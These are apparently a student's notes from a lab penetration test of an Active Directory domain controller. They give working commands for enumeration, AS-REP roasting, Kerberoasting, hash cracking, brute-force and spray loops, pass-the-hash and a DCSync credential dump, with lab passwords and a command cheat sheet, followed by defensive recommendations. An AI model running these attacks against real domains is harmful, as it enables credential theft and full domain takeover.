# Active Directory Penetration Testing — Complete Notes

# Active Directory Penetration Testing — Complete Notes ### Based on GOAD-Mini Lab Assessment --- ## Table of Contents 1. [Lab Environment](#lab-environment) 2. [Methodology Overview](#methodology-overview) 3. [Tools Used](#tools-used) 4. [Phase 1 — Reconnaissance & Network Discovery](#phase-1--reconnaissance--network-discovery) 5. [Phase 2 — Service Enumeration (SMB)](#phase-2--service-enumeration-smb) 6. [Phase 3 — User Enumeration](#phase-3--user-enumeration) 7. [Phase 4 — Password Discovery & Credential Acquisition](#phase-4--password-discovery--credential-acquisition) 8. [Phase 4.5 — Authenticated AD Enumeration](#phase-45--authenticated-ad-enumeration) 9. [Phase 5 — Advanced Exploitation](#phase-5--advanced-exploitation) 10. [Vulnerabilities Found](#vulnerabilities-found) 11. [Defensive Recommendations](#defensive-recommendations) 12. [Key Takeaways](#key-takeaways) --- ## Lab Environment | Component | Detail | |---|---| | Hostname | KINGSLANDING | | Domain | SEVENKINGDOMS / sevenkingdoms.local | | Domain SID | S-1-5-21-3262952663-1425775882-330886615 | | IP Address | 192.168.56.10 | | OS | Windows Server 2019 | | Role | Domain Controller (AD DS + DNS) | | Attacker OS | Linux (Kali/Debian) | | Network | Host-only (192.168.56.0/24) | --- ## Methodology Overview ``` 1. Reconnaissance → Network discovery, port scanning 2. Enumeration → SMB, LDAP, user & group discovery 3. Credential Discovery → Password attacks, reuse testing 4. Exploitation → AS-REP Roasting, Kerberoasting, DCSync 5. Post-Exploitation → Lateral movement preparation ``` --- ## Tools Used | Category | Tools | |---|---| | Network Scanning | Nmap, Nmap NSE scripts | | SMB Enumeration | Enum4linux, Enum4linux-ng, rpcclient, smbclient | | LDAP Enumeration | ldapsearch, ldapdomaindump | | Kerberos Attacks | Kerbrute, Impacket GetNPUsers, GetUserSPNs | | Password Cracking | hashcat (modes 18200, 13100) | | Brute Force | Hydra (limited), custom bash scripts, CrackMapExec/NetExec | | Exploitation | Impacket secretsdump | | Post-Exploit | crackmapexec, rpcclient | --- ## Phase 1 — Reconnaissance & Network Discovery ### Command ```bash nmap -sV -sC -p- --min-rate 1000 192.168.56.10 ``` ### Key Findings - **14 open ports** — confirmed full AD domain controller - **Standard AD ports** all open (Kerberos 88, LDAP 389, SMB 445, etc.) - **Port 80 (HTTP)** open — extra attack surface - **WinRM ports 5985/5986** open — remote management accessible - **Both LDAP (389) and LDAPS (636)** available, plus Global Catalog (3268/3269) ### Domain Info Revealed by Nmap ``` Domain: sevenkingdoms.local Site: Default-First-Site-Name Hostname: kingslanding.sevenkingdoms.local ``` ### SSL Certificate (from LDAPS scan) ``` Subject: commonName=kingslanding.sevenkingdoms.local Valid From: 2026-01-24 Valid To: 2027-01-24 SAN: DNS:kingslanding.sevenkingdoms.local ``` --- ## Phase 2 — Service Enumeration (SMB) ### Enum4linux ```bash enum4linux -a 192.168.56.10 ``` **Findings:** - Domain: SEVENKINGDOMS - NetBIOS Name: KINGSLANDING - MAC: 08:00:27:cd:d4:fb (VirtualBox NIC) - ⚠️ **Anonymous sessions: ALLOWED** (username '', password '') - ✅ SMB signing: Enabled and Required (protects against MITM/relay attacks) ### Enum4linux-ng (Advanced) ```bash enum4linux-ng -A -oJ enum4linux-ng.json 192.168.56.10 ``` Provides: share enumeration, user/group enum, password policy info. ### Nmap SMB Scripts ```bash nmap --script=smb* 192.168.56.10 ``` Key scripts: `smb-enum-shares`, `smb-enum-users`, `smb-os-discovery`, `smb-security-mode`, `smb-vuln-*` > ✅ **SMB signing confirmed required** — good security control, prevents relay attacks. > ⚠️ **Anonymous sessions allowed** — information disclosure risk. --- ## Phase 3 — User Enumeration ### Technique 1: Kerbrute (Most Effective) ```bash kerbrute userenum --dc 192.168.56.10 -d sevenkingdoms.local userlist.txt ``` **How it works:** - Valid username → `KDC_ERR_PREAUTH_REQUIRED` (user exists, needs password) - Invalid username → `KDC_ERR_C_PRINCIPAL_UNKNOWN` (not found) **Advantages:** Fast, no auth needed, low detection risk, bypasses anonymous restrictions. --- ### Technique 2: AS-REP Roasting for User Discovery ```bash GetNPUsers.py sevenkingdoms.local/ -dc-ip 192.168.56.10 -usersfile userlist.txt -format hashcat ``` **Dual benefit:** Discovers valid usernames AND identifies vulnerable accounts simultaneously. **Output messages explained:** | Message | Meaning | |---|---| | `UF_DONT_REQUIRE_PREAUTH not set` | User exists but pre-auth is ON — not roastable | | `KDC_ERR_C_PRINCIPAL_UNKNOWN` | Username doesn't exist | | `KDC_ERR_CLIENT_REVOKED` | Account disabled/locked | | `$krb5asrep$23$user@DOMAIN:...` | ✅ Hash captured — account is AS-REP roastable! | --- ### Technique 3: SMB/RPC Enumeration ```bash enum4linux -U 192.168.56.10 rpcclient -U "" -N 192.168.56.10 → enumdomusers ``` Less reliable; often needs authentication. ### Technique 4: LDAP Anonymous Query ```bash ldapsearch -x -H "ldap://192.168.56.10" -b "DC=sevenkingdoms,DC=local" "(objectClass=user)" sAMAccountName ``` Typically fails on properly configured AD (auth required — and in this lab it was blocked ✅). --- ### Discovered Users (27 total) | Account | Type | Notes | |---|---|---| | Administrator | Admin | High-value target | | TestAdmin | Admin | Test account | | DCSyncUser | Privileged | High-value target | | krbtgt | System | Critical — used in Golden Ticket attacks | | KINGSLANDING$ | Computer | DC computer account | | ASREPUser1 | Test | Pre-auth DISABLED — roastable | | ASREPUser2 | Test | Pre-auth DISABLED — roastable | | SprayUser1, SprayUser2 | Test | Intended for spray testing | | TestUser | Test | Pre-auth disabled; Password: `Password123!` | | ExchangeService | Service | Has SPN — Kerberoastable | | FileService | Service | Has SPN — Kerberoastable | | SQLService | Service | Has SPN — Kerberoastable | | WebService | Service | Has SPN — Kerberoastable | | cersei.lannister, jaime.lannister, joffrey.baratheon, etc. | Users | GoT-themed GOAD accounts | | Guest | Built-in | Usually disabled | | vagrant | Lab | Vagrant deployment account | --- ## Phase 4 — Password Discovery & Credential Acquisition ### Step 1: AS-REP Roasting (No Auth Needed) ```bash # Get hashes GetNPUsers.py sevenkingdoms.local/ -dc-ip 192.168.56.10 \ -usersfile userlist.txt -format hashcat -outputfile asrep_hashes.txt # Crack hashes (mode 18200) hashcat -m 18200 -a 0 asrep_hashes.txt ./passlist.txt ``` **Cracked:** - `TestUser:Password123!` - `ASREPUser1:Password123!` - `ASREPUser2:Password123!` --- ### Step 2: Kerberoasting (Needs 1 Valid Account) ```bash # Request service tickets GetUserSPNs.py -dc-ip 192.168.56.10 \ sevenkingdoms.local/TestUser:Password123! \ -request -outputfile kerberoast_hashes.txt # Crack hashes (mode 13100) hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt --force ``` **Targets:** ExchangeService, FileService, SQLService, WebService (all had SPNs) **Result:** All cracked with `Password123!` --- ### Step 3: SMB Brute Force #### Why Hydra/Medusa FAIL on modern Windows Server 2019: - SMB signing required — these tools don't handle it - SMB 1.0/2.0 only — Server 2019 uses SMB 3.x - Auth handshake mismatches #### Working approach — custom bash script: ```bash for user in $(cat users.txt); do for password in $(cat passlist.txt); do smbclient -L 192.168.56.10 -U "$user%$password" -N >/dev/null 2>&1 if [ $? -eq 0 ]; then echo "VALID: $user:$password" >> valid_credentials.txt fi done done ``` #### CrackMapExec / NetExec (Recommended): ```bash crackmapexec smb 192.168.56.10 -u users.txt -p passwords.txt --continue-on-success # OR newer: netexec smb 192.168.56.10 -u users.txt -p passwords.txt --continue-on-success ``` Better lockout detection, faster, modern SMB support. --- ### Step 4: Password Spraying (Low Lockout Risk) ```bash for password in $(cat spray_passwords.txt); do for user in $(cat users.txt); do smbclient -L 192.168.56.10 -U "$user%$password" -N >/dev/null 2>&1 if [ $? -eq 0 ]; then echo "[+] VALID: $user:$password"; fi sleep 2 # avoid lockouts done done ``` --- ### Account Lockout Awareness | Setting | Windows Default | |---|---| | Lockout threshold | 5 failed attempts | | Lockout duration | 30 minutes | | Counter reset | 30 minutes | **Best practices:** - Use `sleep 2` between attempts - Use password spraying (few passwords × many users) over brute force - Monitor for lockout error messages - Prioritize service accounts first, avoid Administrator initially --- ### Credential Discovery Results | Account | Password | How Found | |---|---|---| | TestUser | Password123! | AS-REP Roasting | | ASREPUser1 | Password123! | AS-REP Roasting | | ASREPUser2 | Password123! | AS-REP Roasting | | ExchangeService | Password123! | Kerberoasting | | FileService | Password123! | Kerberoasting | | SQLService | Password123! | Kerberoasting | | WebService | Password123! | Kerberoasting | | **Administrator** | **8dCT-DJjgScp** | **Dictionary brute force** | --- ### Password Reuse Testing ```bash found_password="8dCT-DJjgScp" for user in $(cat users.txt); do smbclient -L 192.168.56.10 -U "$user%$found_password" -N >/dev/null 2>&1 if [ $? -eq 0 ]; then echo "REUSE: $user:$found_password"; fi done ``` --- ## Phase 4.5 — Authenticated AD Enumeration Once `Administrator:8dCT-DJjgScp` was obtained, full authenticated enumeration was performed. ### LDAP Queries #### Users: ```bash ldapsearch -x -H "ldap://192.168.56.10" \ -D "Administrator@sevenkingdoms.local" -w "8dCT-DJjgScp" \ -b "DC=sevenkingdoms,DC=local" "(objectClass=user)" \ sAMAccountName userPrincipalName description ``` #### Groups: ```bash ldapsearch ... "(objectClass=group)" cn member memberOf ``` #### Computers: ```bash ldapsearch ... "(objectClass=computer)" name operatingSystem lastLogon ``` #### OUs: ```bash ldapsearch ... "(objectClass=organizationalUnit)" ou description ``` ### Full Domain Dump ```bash ldapdomaindump -u "SEVENKINGDOMS\\Administrator" -p "8dCT-DJjgScp" \ 192.168.56.10 -o ldap_dump/ ``` **Output files:** `domain_users.json`, `domain_groups.json`, `domain_computers.json`, `domain_ous.json`, `domain_policy.json` --- ## Phase 5 — Advanced Exploitation ### DCSync Attack ```bash secretsdump.py -dc-ip 192.168.56.10 \ sevenkingdoms.local/Administrator:8dCT-DJjgScp@192.168.56.10 \ -just-dc ``` **What it extracts:** - NTLM hashes for ALL domain accounts - LM hashes (if enabled) - Kerberos AES keys - **krbtgt hash** → enables Golden Ticket attacks **Why it's catastrophic:** Single command = complete domain credential dump. **Required permissions for DCSync:** - Domain Admin, OR - "Replicating Directory Changes", OR - "Replicating Directory Changes All" rights --- ### Authenticated SMB Enumeration (Pass-the-Hash) ```bash crackmapexec smb 192.168.56.10 \ -u Administrator \ -H c66d72021a2d4744409969a581a1705e \ --shares ``` ### RPC Enumeration (Authenticated) ```bash rpcclient -U "Administrator%8dCT-DJjgScp" 192.168.56.10 > enumdomusers ``` --- ## Vulnerabilities Found ### Critical | ID | Finding | Impact | |---|---|---| | F-01 | Weak Domain Admin password (`8dCT-DJjgScp`) | Immediate full domain control | | F-02 | Excessive privileges enabled DCSync | All domain credentials extracted in one operation | ### High | ID | Finding | Impact | |---|---|---| | F-03 | AS-REP Roastable accounts (ASREPUser1, ASREPUser2) | Offline cracking without authentication | | F-04 | Kerberoastable service accounts with weak passwords | Service account takeover, lateral movement | ### Medium | ID | Finding | Impact | |---|---|---| | F-05 | Partial anonymous SMB sessions allowed | Unauthenticated info gathering | | F-06 | HTTP (port 80) open on DC | Extra attack surface, potential info leak | ### Positive Controls Observed ✅ | ID | Control | Value | |---|---|---| | P-01 | SMB signing required | Prevents relay/MITM attacks | | P-02 | Anonymous LDAP bind disabled | Prevents unauthenticated directory scraping | --- ## Defensive Recommendations ### Immediate (High Priority) 1. **Eliminate weak/default credentials** - Reset Administrator and all service accounts - Use unique passwords — no sharing across accounts - Store privileged credentials in a vault 2. **Fix Kerberos pre-auth misconfigurations** - Enable pre-authentication on ALL user accounts - Audit for `DONT_REQ_PREAUTH` flag regularly - Alert on changes to this flag 3. **Strengthen password policy** - Minimum 14+ characters (higher for privileged/service accounts) - Enforce complexity or use long passphrases - Enable password history + minimum age - Implement MFA for administrative access ### Long-Term (Strategic) 4. **Privileged Access Management (PAM)** - JIT (Just-In-Time) privilege elevation - Privileged Access Workstations (PAWs) - Regular access reviews; reduce Domain Admin members 5. **Service Account Hardening** - Migrate to **gMSA** (Group Managed Service Accounts) — auto-rotating passwords - Deny interactive logon for service accounts - Constrain delegation - Reduce SPN exposure 6. **Reduce DC Attack Surface** - Remove non-essential services (e.g., no HTTP on DCs) - Role separation — no extra workloads on DCs 7. **Network Segmentation** - Isolate DCs from user subnets - Firewall/ACL for SMB (445), WinRM (5985/5986), LDAP (389/636), Kerberos (88) 8. **LAPS — Local Admin Password Solution** - Randomize local admin passwords per machine - Prevent lateral movement via password reuse ### Monitoring & Detection 9. **Enable Advanced Auditing** for: - Account Logon (success + failure) - Logon/Logoff (success + failure) - Account Management - Directory Service Access - Privilege Use - Policy Change 10. **Alert on these AD attack patterns:** - Unusual Kerberos auth failures (enumeration/spraying) - Spike in TGS requests to SPNs → Kerberoasting - DC replication operations from non-DC hosts → DCSync - Excessive failed logons across many users → password spray - Privileged group membership changes - Unexpected admin logons 11. **Protected Users Group** — add high-value accounts to prevent credential caching, Kerberos delegation abuse, etc. --- ## Key Takeaways ### Attack Side - **Enumeration is decisive** — thorough recon directly enables all downstream attacks - **One weak privileged credential collapses the entire domain** — even with good controls elsewhere - **Service accounts are high-value targets** — SPNs + weak passwords = easy offline cracking - **Password reuse is a force multiplier** — one cracked password can open many accounts - **AS-REP Roasting is free** — no credentials needed, purely passive from the network ### Defense Side - **Network controls alone are not enough** — credential hygiene is non-negotiable - **Many AD attacks are detectable** — proper auditing + centralized logging + alerting - **Least privilege matters** — smaller blast radius if one account is compromised - **gMSA for service accounts** — removes the human password hygiene problem entirely - **Clock sync (NTP) is critical for Kerberos** — drift > 5 min causes `KRB_AP_ERR_SKEW` and breaks auth --- ## Quick Reference: Hash Cracking Modes | Attack | Hash Prefix | Hashcat Mode | |---|---|---| | AS-REP Roasting | `$krb5asrep$23$` | 18200 | | Kerberoasting | `$krb5tgs$23$` | 13100 | | NTLM | (no prefix) | 1000 | --- ## Quick Reference: Key Commands ```bash # Kerbrute user enum kerbrute userenum --dc 192.168.56.10 -d sevenkingdoms.local userlist.txt # AS-REP Roasting GetNPUsers.py sevenkingdoms.local/ -dc-ip 192.168.56.10 -usersfile users.txt -format hashcat -outputfile asrep.txt # Kerberoasting GetUserSPNs.py -dc-ip 192.168.56.10 sevenkingdoms.local/user:pass -request -outputfile kerb.txt # Full domain dump ldapdomaindump -u "DOMAIN\\user" -p "pass" 192.168.56.10 -o ldap_dump/ # DCSync secretsdump.py -dc-ip 192.168.56.10 sevenkingdoms.local/Administrator:pass@192.168.56.10 -just-dc # Crack AS-REP hashcat -m 18200 -a 0 asrep.txt wordlist.txt # Crack Kerberoast hashcat -m 13100 kerb.txt wordlist.txt ```